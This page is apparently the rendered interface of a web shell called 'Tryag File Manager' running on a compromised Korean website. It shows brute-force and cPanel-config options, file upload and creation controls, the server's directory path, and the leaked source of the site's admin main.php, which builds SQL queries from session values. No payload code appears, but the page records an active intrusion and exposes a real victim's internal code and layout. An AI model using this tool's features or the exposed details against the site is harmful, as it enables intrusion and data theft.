Tryag File Manager
Home
||
Turbo Force
||
B-F Config_Cpanel
Current Path :
/
home
/
ltms.eemo.co.kr
/
public_html
/
super
/
Or
Select Your Path :
Upload File :
New :
File
Dir
/home/ltms.eemo.co.kr/public_html/super/main.php
<? session_cache_limiter('no-cache, must-revalidate'); session_start(); header("Pragma: no-cache"); header("Cache-Control: no-cache,must-revalidate"); header("Content-Type: text/html; charset=utf-8"); include_once("dbconn.php"); include_once("lib.php"); $rs_my=RS("select * from admin_member where no='{$_SESSION[mem_no]}' "); if($rs_my[mlevel]==3) { header("Location: myfarm.php"); } else if($rs_my[mlevel]==2) { $rs_per=RS("select * from admin_permit where admin_mem_no='{$_SESSION[mem_no]}' and menu_access='1' "); $pg=$arr_sub_page[$rs_per[menu_id]][1]; header("Location: {$pg}"); } else { header("Location: notice.php"); } ?>